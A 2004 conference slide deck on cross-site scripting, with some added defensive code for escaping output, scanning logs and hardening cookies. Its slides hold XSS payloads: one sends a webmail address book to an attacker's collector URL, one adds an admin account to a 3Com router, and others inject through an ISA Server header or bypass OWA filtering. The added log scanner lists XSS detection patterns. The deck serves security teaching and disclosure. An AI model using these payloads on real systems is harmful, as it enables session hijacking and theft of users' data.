
Page 1: Not only a XSS

Toni Cortès Martínez

Infohacking Research

Not only a XSS

FIST Conference March 2004

Page 2: Not only a XSS

Infohacking Research Not Only a XSS2

Guideline

- Introduction
- XSS today
- Let's see some XSS

Page 3: Not only a XSS

Introduction

- What's this? XSS?
- How does it work?
- Where does it work?
- Application level security.
- OK, but it's only a XSS.

Page 4: Not only a XSS

XSS

XSS (common attacks): when somebody can exploit user inputs to get an unexpected response.

- The error is usually due to poor filtering of user inputs and/or of the output from dynamically generated pages.
- This could allow access to something restricted to the user, for example session credentials (cookies, session IDs, etc.).

Page 5: Not only a XSS

How it works

- The attacker must trick the victim into making a special HTTP request.
- Usually exploited in web environments:
  1) Webmails
  2) Web forums
  3) Any web application (dynamic content) that allows user interaction
- Other applications that render some output in HTML (log viewers, mail clients): "HTML injection" (like ILLC techniques).
- Exploits an insecure programming methodology.
- The attacker usually wants the victim to do something:
  - send out some cookie (session or permanent)
  - make an HTTP request for you ;)
- The goal of XSS: we are in the victim's environment.

Page 6: Not only a XSS

How it works, example

- We found a flaw on a server (e.g. an online bank with an email service).
- Construct a special request to exploit this flaw (XSS) and obtain user credentials.
- Send a message to the victim (with window.open, img src, etc.).
- Wait for the user to access it and get the session-tracking cookie.
- Access the online bank with the user's credentials (the stolen cookie).
- Now we are this user for a while.

Page 7: Not only a XSS

Where does it work?

- Any dynamically generated content that depends on the user's input is a potential XSS security hole.

  Enter your name: Toni
  Hi Toni

- Simple example of exploitation on a dynamic page:

  Enter your name: Toni<script>alert('Hello XSS')</script>
  Hi Toni
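The "Hi Toni" page above is the classic reflected case: the name is concatenated straight into the HTML. The following is an added example, not code from the slides or from Infohacking Research, showing the same page in Node.js once the vulnerable way and once with output encoding for both text and attribute context; the function names, the `name` query parameter and the sample inputs are assumptions for illustration.

```javascript
// Added example (not from the original slides): output encoding for the
// "Enter your name / Hi <name>" page. Function names and inputs are constructed.

// Escape the characters that change meaning in HTML text and in quoted
// attribute values. "&" must go first so already-escaped text is not mangled.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable rendering (the behaviour the slide describes): the user-supplied
// name is concatenated directly into the page, so markup in it is interpreted.
function renderGreetingUnsafe(name) {
  return "<p>Hi " + name + "</p>";
}

// Hardened rendering: the same page with the name escaped where it lands in
// text context and where it is echoed back into a quoted attribute.
function renderGreetingSafe(name) {
  const safe = escapeHtml(name);
  return (
    "<p>Hi " + safe + "</p>" +
    '<form><input name="name" value="' + safe + '"></form>'
  );
}

// What a request handler would do: pull the (percent-decoded) "name"
// parameter out of the request URL and render it safely.
function greetingForRequest(requestUrl) {
  const url = new URL(requestUrl);
  const name = url.searchParams.get("name") || "";
  return renderGreetingSafe(name);
}

// Regression check a test suite can run over rendered pages: did an
// executable script tag survive into the output?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed inputs: the benign name from the slide and the slide's
// proof-of-concept payload.
const SAMPLE_NAME = "Toni";
const SAMPLE_PAYLOAD = "Toni<script>alert('Hello XSS')</script>";

console.log("unsafe: " + renderGreetingUnsafe(SAMPLE_PAYLOAD));
console.log("safe:   " + renderGreetingSafe(SAMPLE_PAYLOAD));
```

The escaped form renders literally as the text the user typed, so the browser shows the whole string instead of executing it; `containsScriptTag` is the kind of assertion worth keeping in a test suite so a later refactor cannot quietly drop the encoding.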

Page 8: Not only a XSS

Application level security

- Nowadays, application level security is one of the computing challenges.
- Application level firewalls like HIVE or layer 7 filters.
- Client side security is out of the webmasters' control.
- Servers can only do their best trying to filter any data coming from the client side.
- Fact: most XSS based attacks and vulnerabilities are easy to exploit. No special skills are needed -> script kiddies.
- XSS is useful to impersonate a user but doesn't provide a direct or easy way of controlling a computer... umm, well, you still can do a lot of things ;-)

Page 9: Not only a XSS

OK, but it's only a XSS...

- Yes, XSS attacks seem harmless by themselves, but they could open other attack vectors.
- We can gain access to a web-admin tool. (IIS 6.0 Web Admin XSS vulnerability)
- XSS breaks old HTTP session tracking methods: use of IDs in the URL, cookies and also source-IP based authentication. (Iplanet Messaging Server XSS vulnerability)
- Combination of XSS with other flaws to launch a more complex attack:
  - Hotmail XSS and AV bypass
  - Microsoft user domain credentials access via OWA XSS (via XST)

Page 10: Not only a XSS

XSS today

- XSS, next generation attacks.
  - Proof of concept: HTTP redirection
- XSS based worms & trojans
  - XSS worm
  - XSS trojan
- Anyone could be affected by XSS

Page 11: Not only a XSS

XSS next generation attacks

- HTTP response redirection (information leak) (Zeus Web Admin XSS)
- HTTP bouncing (fully interactive) ... under construction

Page 12: Not only a XSS

Proof of concept: HTTP redirection

Example of an evil link that steals the address book of the victim's webmail:

http://<target>/vulnerable.cgi?variable=<script>function%20pedo(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<target>/address_book.cgi",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;window.open("http://www.infohacking.com/data_collector.php?response="+xmlDoc);} pedo();</script>

Page 13: Not only a XSS

HTTP redirection

Which means:

http://<target>/vulnerable.cgi?variable= (server path to script injection)

<script>
function pedo(){
  var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
  xmlHttp.open("GET","http://<target>/address_book.cgi",false);  // MAKE REQUEST
  xmlHttp.send();
  xmlDoc=xmlHttp.responseText;                                   // STORE RESPONSE
  window.open("http://<attacker_site>/"+xmlDoc);                // SEND RESPONSE TO ATTACKER
}
pedo();
</script>

Note: we use "window.open" to send the response in order to bypass the "xmlHttp.open" security restrictions.

Page 14: Not only a XSS

XSS based worms & trojans

General "features":
- Spreading through webmail servers
- Self-decrypting script routine
- Can modify permanent cookies (trojan)
- Can force session logout (D.o.S.)
- Can impersonate the user
- Can steal information (mail content, address book, etc.)
- Hard to detect by AV software (encrypted payload)
- If no user action is needed (as with XSS in some field of the mail) then the spreading will be very fast!

Page 15: Not only a XSS

XSS worm

How it works:
- Once executed, the script will self-decrypt and try to detect the source (Hotmail, Yahoo, Terra, ...) or the webmail software (Iplanet, etc.). It can be done with a simple "document.URL" and comparing it with some patterns.
- If the source is known:
  - try to get the address book
  - filter only webmail addresses
  - auto-send routine

Page 16: Not only a XSS

XSS trojan

How it works:
- Once executed, the script will self-decrypt and try to set a permanent cookie (it will be stored on the victim's hard disk).
- The modified cookie could change some option: it can set Chinese as the default language ;-) (D.o.S.)
- The modified cookie could redirect the victim to some place on the server that is controlled by the attacker (changing some profile setting in the cookie).
- As with worms, the trojan could try to spread...

Page 17: Not only a XSS

Anyone can be affected by XSS

Recent example: ViewCVS.py

Affected sites: Sourceforge.net, Apache.org, Iptables.org.

Those sites are well known to everybody, and they are probably managed by security-concerned people...

... anyway, they still can be exposed to XSS risks...

Page 18: Not only a XSS

Sourceforge.net

Page 19: Not only a XSS

Apache.org

Page 20: Not only a XSS

Iptables.org

Page 21: Not only a XSS

XSS examples

Some XSS examples from Infohacking Research:
- 3Com 812 ADSL router -> we add a new admin
- Inktomi Traffic Server -> all users vulnerable to this XSS
- Iplanet Messaging Server -> session hijack
- Microsoft ISA Server
- OWA XSS -> access to user credentials

Page 22: Not only a XSS

XSS on 3Com ADSL router

There are a lot of XSS present on the OCR812:

http://<ip_of_OCR812>/<script>document.write("<b>WE_CAN_INJECT_CODE</b>")</script>

Page 23: Not only a XSS

XSS on 3Com ADSL router

- With XSS we can insert new users into our router.
- We can use window.open, or <img src=..>, to make our special request:

//Forms/admin_telnet_add"+String.fromCharCode(63)+"uumUserName=infohacking&uumUserPassword=

Page 24: Not only a XSS

XSS on 3Com ADSL router

We can make the complete process if we know the IP, user and password (for example, the old admin):

<html>
<img src="<ip_or_name_of_OCR812>/legalizacion_marihuana.jpg">
<script type="text/javascript">
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP")
xmlHttp.open("GET", "<YOUR_FUCKING_REQUEST>", false)
xmlHttp.setRequestHeader("Authorization", "Basic User:Password(base64 encoded)")
xmlHttp.send()
</script>
</html>

Page 25: Not only a XSS

Inktomi Traffic Server XSS

- Inktomi Traffic Server is a proxy cache used in several countries by ISPs. Also known in Spain as "Proxy cache de Telefónica".
- A special request by a client passing through the Inktomi Traffic Server causes an error page generated by the proxy. This dynamic error page is vulnerable to Cross Site Scripting...
- Indirectly, any server whose clients come through the Traffic Server and which uses cookies to track sessions is "vulnerable".
- The client making the request IS UNABLE to distinguish what domain generated this code...

Page 26: Not only a XSS

Inktomi Traffic Server XSS

Exploit?
- We tested it on version 5.5.1.
- We only need to configure a proxy on ANY IP with port 80.
- Make a special request:

http://<spoofed_domain>:443/</em><script>alert()</script>

We can see the script executed in our browser, "generated" by the spoofed domain. Now we can access cookies and everything, like a man-in-the-middle attack.

Page 27: Not only a XSS

Iplanet messaging server XSS

- This webmail, Iplanet Messaging Server, allows us to hijack the SID.
- This server allows "online" opening of file attachments. This means that any HTML file will be opened by the client browser in the Iplanet webmail domain context. Wonderful XSS ;-)
- Now we can exploit this XSS with an HTML attachment.
- With document.URL we obtain the SID and userid (located in the URL).
- With the SID, we gain access to all attachments:

http://<iplanet_host>/attach/file.html?sid=XYXYXYXYXYXYXY&mbox=INBOX&uid=XXXXX&number=2&filename=file.html

Page 28: Not only a XSS

Iplanet messaging server XSS

But this is not easy.... Iplanet webmail includes IP session tracking.

When can we use the hijacked SID?
- If we are near the victim, behind a NAT device, we can access with his SID.
- We can steal the session of all the people who access through a transparent proxy (like transparent proxy devices).
- Or we can create a script to force the user to make the request and redirect it to us. Of course... they don't see anything... (see above)

Note: a lot of web servers use the same session cookie on both the http and https domains. (This note is for the online bank developers.)

Page 29: Not only a XSS

Microsoft ISA Server XSS

This example shows an XSS exploited using headers.
- When we try to go to an unreachable URL through ISA Server, ISA generates an error page showing some data (the content of the "Via" header).
- We fix this header.
- Now we can request a non-existent URL in an existing domain. (Usually the server uses the same cookie on all of its domain.)
- Steal cookies.
- Access.
- We don't need a flaw in the server code. Use ISA Server instead.

Page 30: Not only a XSS

ISA Server exploit

<html><body><script type="text/javascript">
alert("Click OK then wait for a few seconds...")
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP")
xmlHttp.open("GET", "http://www.infohacking.com:113", false)
xmlHttp.setRequestHeader("Via", "CODE_INJECTED_IN_VIA_HEADER\<script>alert\(\"ISA_SERVER_XSS_by_INFOHACKING\"\)\<\/script\>")
xmlHttp.send()
xmlDoc=xmlHttp.responseText
document.write(xmlHttp.responseText)
</script></body></html>
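Both reflection channels shown so far leave a trace in server or proxy logs: the HTTP redirection proof of concept (Page 12) carries percent-encoded script in the query string, and the ISA Server case above carries it in a request header that an error page echoes back. The following is an added example, not code from the slides or from Infohacking Research, of detection logic a defender could run over such logs: it percent-decodes each field (repeatedly, so double-encoded payloads are caught) and reports which field carried which indicator. The JSON-lines log format, the field names and every sample entry are constructed for this illustration.

```javascript
// Added example (not from the original slides): scan request logs for the
// reflected-script indicators seen on Page 12 (query string) and Page 30
// (Via header). Log format and sample entries are constructed.

// Indicators, matched after percent-decoding and lower-casing. The array
// order fixes the order in which findings are reported.
const INDICATORS = [
  { name: "script-tag", re: /<\s*\/?\s*script\b/ },
  { name: "event-handler", re: /\bon(load|error|click|mouseover|focus|submit)\s*=/ },
  { name: "javascript-uri", re: /javascript\s*:/ },
  { name: "activex-xmlhttp", re: /activexobject\s*\(/ },
  { name: "cookie-access", re: /document\s*\.\s*cookie/ },
  { name: "fromcharcode", re: /fromcharcode/ },
];

// Percent-decode up to three times (double encoding is a common way to slip
// past a single decode); stop when decoding no longer changes the string or
// fails on a malformed escape.
function normalise(value) {
  let s = String(value).replace(/\+/g, " ");
  for (let i = 0; i < 3; i++) {
    let decoded;
    try {
      decoded = decodeURIComponent(s);
    } catch (err) {
      break; // malformed escape sequence: keep what we have so far
    }
    if (decoded === s) break;
    s = decoded;
  }
  return s.toLowerCase();
}

// Names of every indicator present in one field value.
function indicatorsIn(value) {
  const text = normalise(value);
  return INDICATORS.filter((ind) => ind.re.test(text)).map((ind) => ind.name);
}

// Scan JSON-lines entries of the constructed shape
//   {"ip": "...", "method": "GET", "uri": "/path?query", "headers": {"via": "...", "referer": "..."}}
// and report, per line, which field carried which indicators. Lines that are
// not valid JSON are skipped rather than aborting the scan.
function scanLogLines(lines) {
  const findings = [];
  lines.forEach((raw, index) => {
    let entry;
    try {
      entry = JSON.parse(raw);
    } catch (err) {
      return;
    }
    const fields = { uri: entry.uri || "" };
    for (const [name, value] of Object.entries(entry.headers || {})) {
      fields[name.toLowerCase()] = value;
    }
    for (const [field, value] of Object.entries(fields)) {
      const hits = indicatorsIn(value);
      if (hits.length > 0) {
        findings.push({ line: index + 1, ip: entry.ip, field, indicators: hits });
      }
    }
  });
  return findings;
}

// Constructed sample log: a benign request, a Page-12 style query-string
// payload, a Page-30 style Via header payload, a double-encoded payload and
// one malformed line.
const SAMPLE_LOG = [
  { ip: "192.0.2.10", method: "GET", uri: "/index.cgi?name=Toni",
    headers: { via: "1.1 proxy.example.test", referer: "http://webmail.example.test/inbox" } },
  { ip: "192.0.2.11", method: "GET",
    uri: "/vulnerable.cgi?variable=%3Cscript%3Efunction%20pedo(){var%20xmlHttp%20=%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);}%20pedo();%3C/script%3E",
    headers: {} },
  { ip: "192.0.2.12", method: "GET", uri: "/",
    headers: { via: 'CODE_INJECTED_IN_VIA_HEADER<script>alert("x")</script>' } },
  { ip: "192.0.2.13", method: "GET", uri: "/search?q=%253Cscript%253Ealert(1)%253C%252Fscript%253E",
    headers: {} },
].map((entry) => JSON.stringify(entry)).concat(["not a json line"]);

for (const f of scanLogLines(SAMPLE_LOG)) {
  console.log(`line ${f.line} ip=${f.ip} field=${f.field} indicators=${f.indicators.join(",")}`);
}
```

The point of scanning headers as well as the URI is exactly the ISA case: a proxy that reflects `Via` into an error page turns a header nobody logs by default into an injection channel, so the reverse proxy or WAF in front of such a product should log and inspect it.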

Page 31: Not only a XSS

OWA XSS

What do we have here?
- With OWA you can see an HTML formatted e-mail.
- A user must click on a special link for this purpose in the webmail interface, and an alert will pop up.
- To avoid people executing malicious content in the client browser, OWA will try to filter the content of the mail.
- Good, but... not enough.

Page 32: Not only a XSS

Disabling OWA filtering

The URL to view an HTML formatted mail is something like this:

http://<IP_or_name_of_the_server>/exchange/<username>/<inbox_name>/<subject>.EML/1_multipart/2_text.htm?Security=1

Good name for a parameter; another name might be "change_this_for_fucking_us".

We only need to remove this parameter, and OWA doesn't apply the filter.

Page 33: Not only a XSS

OWA XSS

Obtaining data to create our special link:
- We need the IP or hostname of the server, the user name and the subject.
- All this we can find in the "Referer" header of an HTTP request coming from a link in the body of the message.

Now with the referrer, we can send our attack:
- We have the IP or hostname of the server (from the referrer).
- We have the user name (from the referrer).
- We know the subject.
- We create a link in the body of the message, without the "Security" parameter (a link to the same message without the Security parameter).

<img src="http://<site_of_the_attacker>">

Page 34: Not only a XSS

OWA, stolen credentials

Nothing else?
- OWA uses cookies to track the HTTP session, but also uses "Basic Auth" for... more security? ;-)
- This "Basic Auth" (-> base64 encoded user:passwd) contains the user credentials for this domain.
- To access the "Basic Auth" header, the easiest way is via an HTTP "TRACE" request... and IIS (Internet Information Server) by default will allow those kinds of requests.
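Two of the exposures in these slides are fixed at the server rather than in the page: the Page 28 note (one session cookie shared by the http and https sites) and the TRACE/XST path above (a request echo that hands the Authorization header to script). The following is an added example, not code from the slides or from Infohacking Research, of the corresponding server-side controls in Node.js: a session cookie issued with the `Secure` and `HttpOnly` attributes, an audit of an existing `Set-Cookie` value, and a request policy that refuses `TRACE` (and the IIS-specific `TRACK` alias). Function names and the sample values are assumptions for illustration.

```javascript
// Added example (not from the original slides): server-side controls for the
// session-cookie and TRACE exposures discussed on Pages 28 and 34. Names
// and sample values are constructed.

// Issue a session cookie that is only sent over HTTPS ("Secure", so the
// plain-http site never sees it) and is not readable by script ("HttpOnly",
// so injected script cannot read it from document.cookie).
function buildSessionCookie(name, value, opts = {}) {
  const maxAge = Number.isInteger(opts.maxAgeSeconds) ? opts.maxAgeSeconds : 900;
  // Reject names/values that would let a caller smuggle extra attributes.
  if (!/^[A-Za-z0-9_-]+$/.test(name) || /[\s;,]/.test(String(value))) {
    throw new Error("invalid cookie name or value");
  }
  return `${name}=${value}; Path=/; Max-Age=${maxAge}; Secure; HttpOnly`;
}

// Audit a Set-Cookie header value and return the protections it lacks.
function auditSetCookie(header) {
  const parts = String(header).split(";").map((p) => p.trim());
  const attrs = new Set(parts.slice(1).map((p) => p.split("=")[0].toLowerCase()));
  const missing = [];
  if (!attrs.has("secure")) missing.push("Secure");
  if (!attrs.has("httponly")) missing.push("HttpOnly");
  return missing;
}

// Method policy for a front end in front of a webmail: TRACE (and TRACK,
// the IIS alias) echo the request back, which is what lets a cross-site
// script read the Authorization or Cookie header, so they are refused.
const ALLOWED_METHODS = new Set(["GET", "HEAD", "POST"]);

function policyForRequest(req) {
  const method = String(req.method || "").toUpperCase();
  if (method === "TRACE" || method === "TRACK") {
    return {
      status: 405,
      reason: "TRACE/TRACK disabled: request echo would reveal Authorization and Cookie headers",
    };
  }
  if (!ALLOWED_METHODS.has(method)) {
    return { status: 405, reason: "method not allowed" };
  }
  return { status: 200, reason: "ok" };
}

// Constructed sample: a weak cookie as a legacy server might issue it, the
// hardened replacement, and a TRACE request hitting the policy.
const LEGACY_COOKIE = "sid=abc123; Path=/";
const HARDENED_COOKIE = buildSessionCookie("sid", "abc123", { maxAgeSeconds: 60 });

console.log("legacy cookie missing:", auditSetCookie(LEGACY_COOKIE));
console.log("hardened cookie:", HARDENED_COOKIE, "missing:", auditSetCookie(HARDENED_COOKIE));
console.log("TRACE ->", policyForRequest({ method: "TRACE" }));
```

`Secure` is the direct answer to the Page 28 note: a cookie that the browser refuses to send over http cannot be collected by any of the plaintext-path tricks on that slide, and refusing TRACE at the edge removes the Basic Auth leak even when the application behind it still relies on that header.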

Page 35: Not only a XSS

XSS

That's all folks??

Of course, as always, the attacker's imagination is the only limit... much more fun is possible.

Thanks for your attention.

Page 36: Not only a XSS

© Toni Cortes Martinez & Hugo Vazquez Carames

Infohacking Research

Barcelona, 7 May 2004

FIST Conference March 2004

Not only a XSS